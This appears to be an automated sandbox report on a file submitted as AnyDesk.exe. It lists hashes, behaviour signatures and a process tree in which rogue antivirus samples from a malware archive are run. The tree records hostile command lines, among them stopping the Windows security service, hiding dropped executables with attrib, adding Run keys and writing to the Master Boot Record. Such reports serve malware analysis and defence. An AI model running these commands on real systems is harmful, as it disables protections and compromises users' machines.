Resubmissions

31-12-2023 09:11

231231-k5vvksadc3 6

29-12-2023 08:53

231229-ktts5sgbh8 10

Analysis

  • max time kernel
    1193s
  • max time network
    1195s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64 arch:x86 image:win11-20231215-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    29-12-2023 08:53

General

  • Target

    AnyDesk.exe

  • Size

    5.3MB

  • MD5

    75eecc3a8b215c465f541643e9c4f484

  • SHA1

    3ad1f800b63640128bfdcc8dbee909554465ee11

  • SHA256

    ec33d8ee9c3881b8fcea18f9f862d5926d994553aec1b65081d925afd3e8b028

  • SHA512

    b3a48230fc6f20038c938e5295b68a3f020b94e220ca2fab6a894d126dc41f6f1021c239613bf9d6de84370ad7df9d9a91baf716a87d43eb101ee3e48578e5ff

  • SSDEEP

    98304:j5ObAu2pmits24nYhQCWQdaQQo/mJPv4KYZPKBhYI5RuN4OL2wIjcsJWNg3:IAnRu24nR5QcTvYdmPuWOL2TcQWe3

Malware Config

Signatures

  • Windows security bypass 2 TTPs 3 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Blocks application from running via registry modification 18 IoCs

    Adds application to list of disallowed applications.

  • Disables RegEdit via registry modification 1 IoCs
  • Drops file in Drivers directory 4 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 36 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 29 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 26 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 63 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 16 IoCs
  • Modifies Internet Explorer start page 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
    "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"
    1⤵
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-control
      2⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3808
    • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-service
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1376
      • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
        "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:1380
      • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
        "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:5020
      • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
        "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:3648
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004EC
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1696
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff1ab23cb8,0x7fff1ab23cc8,0x7fff1ab23cd8
      2⤵
        PID:1968
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
        2⤵
          PID:4744
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3212
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
          2⤵
            PID:2248
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
            2⤵
              PID:4756
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
              2⤵
                PID:1972
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                2⤵
                  PID:3768
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
                  2⤵
                    PID:236
                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1176
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5108
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                    2⤵
                      PID:800
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                      2⤵
                        PID:3156
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5356 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:456
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5272 /prefetch:8
                        2⤵
                          PID:1804
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                          2⤵
                            PID:3836
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                            2⤵
                              PID:3048
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                              2⤵
                                PID:4156
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
                                2⤵
                                  PID:428
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
                                  2⤵
                                    PID:4160
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1
                                    2⤵
                                      PID:4764
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
                                      2⤵
                                        PID:3928
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
                                        2⤵
                                          PID:484
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
                                          2⤵
                                            PID:3904
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6492 /prefetch:8
                                            2⤵
                                              PID:4148
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
                                              2⤵
                                                PID:3112
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
                                                2⤵
                                                  PID:3156
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3456
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4360
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:4308
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:3048
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:4316
                                                    • C:\Windows\System32\rundll32.exe
                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                      1⤵
                                                        PID:1264
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\" -spe -an -ai#7zMap10067:106:7zEvent12014
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1184
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\*\" -spe -an -ai#7zMap4424:1392:7zEvent26269
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1832
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\*\" -spe -an -ai#7zMap31253:3994:7zEvent2670
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2752
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\ransomwares\*\" -spe -an -ai#7zMap10873:2380:7zEvent28753
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3804
                                                      • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus\[email protected]
                                                        "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus\[email protected]"
                                                        1⤵
                                                        • Adds Run key to start application
                                                        • Drops file in Program Files directory
                                                        • Executes dropped EXE
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2892
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net stop wscsvc
                                                          2⤵
                                                            PID:3452
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop wscsvc
                                                              3⤵
                                                                PID:2216
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net stop winmgmt /y
                                                              2⤵
                                                                PID:2868
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop winmgmt /y
                                                                  3⤵
                                                                    PID:2920
                                                                • C:\Windows\SysWOW64\Wbem\mofcomp.exe
                                                                  mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof
                                                                  2⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1312
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net start wscsvc
                                                                  2⤵
                                                                    PID:4120
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 start wscsvc
                                                                      3⤵
                                                                        PID:4692
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net start winmgmt
                                                                      2⤵
                                                                        PID:3052
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 start winmgmt
                                                                          3⤵
                                                                            PID:4644
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4732
                                                                      • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus 2010\[email protected]
                                                                        "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus 2010\[email protected]"
                                                                        1⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        • Executes dropped EXE
                                                                        PID:4176
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe"
                                                                          2⤵
                                                                            PID:2584
                                                                          • \??\globalroot\systemroot\system32\usеrinit.exe
                                                                            /install
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2564
                                                                        • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Platinum\[email protected]
                                                                          "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Platinum\[email protected]"
                                                                          1⤵
                                                                          • Drops file in Windows directory
                                                                          • Executes dropped EXE
                                                                          PID:1636
                                                                          • C:\WINDOWS\302746537.exe
                                                                            "C:\WINDOWS\302746537.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:4148
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D1B9.tmp\302746537.bat" "
                                                                              3⤵
                                                                                PID:3464
                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                  regsvr32 /s c:\windows\comctl32.ocx
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  • Modifies registry class
                                                                                  PID:1588
                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                  regsvr32 /s c:\windows\mscomctl.ocx
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  • Modifies registry class
                                                                                  PID:4140
                                                                                • \??\c:\windows\antivirus-platinum.exe
                                                                                  c:\windows\antivirus-platinum.exe
                                                                                  4⤵
                                                                                  • Windows security bypass
                                                                                  • Disables RegEdit via registry modification
                                                                                  • Windows security modification
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies Internet Explorer start page
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • System policy modification
                                                                                  PID:1800
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +h c:\windows\antivirus-platinum.exe
                                                                                  4⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Views/modifies file attributes
                                                                                  PID:2800
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]"
                                                                            1⤵
                                                                            • Adds Run key to start application
                                                                            • Enumerates connected drives
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SendNotifyMessage
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:588
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]"
                                                                            1⤵
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Executes dropped EXE
                                                                            PID:3428
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\AnViPC2009\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\AnViPC2009\[email protected]"
                                                                            1⤵
                                                                            • Drops file in Program Files directory
                                                                            • Executes dropped EXE
                                                                            PID:652
                                                                            • C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                              "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SendNotifyMessage
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2216
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\FakeAdwCleaner\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\FakeAdwCleaner\[email protected]"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            PID:384
                                                                            • C:\Users\Admin\AppData\Local\6AdwCleaner.exe
                                                                              "C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
                                                                              2⤵
                                                                              • Adds Run key to start application
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3236
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Happy Antivirus\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Happy Antivirus\[email protected]"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:2516
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\[email protected]"
                                                                            1⤵
                                                                            • Enumerates VirtualBox registry keys
                                                                            • Blocks application from running via registry modification
                                                                            • Drops file in Drivers directory
                                                                            • Adds Run key to start application
                                                                            • Checks for any installed AV software in registry
                                                                            • Enumerates connected drives
                                                                            • Sets file execution options in registry
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Executes dropped EXE
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies data under HKEY_USERS
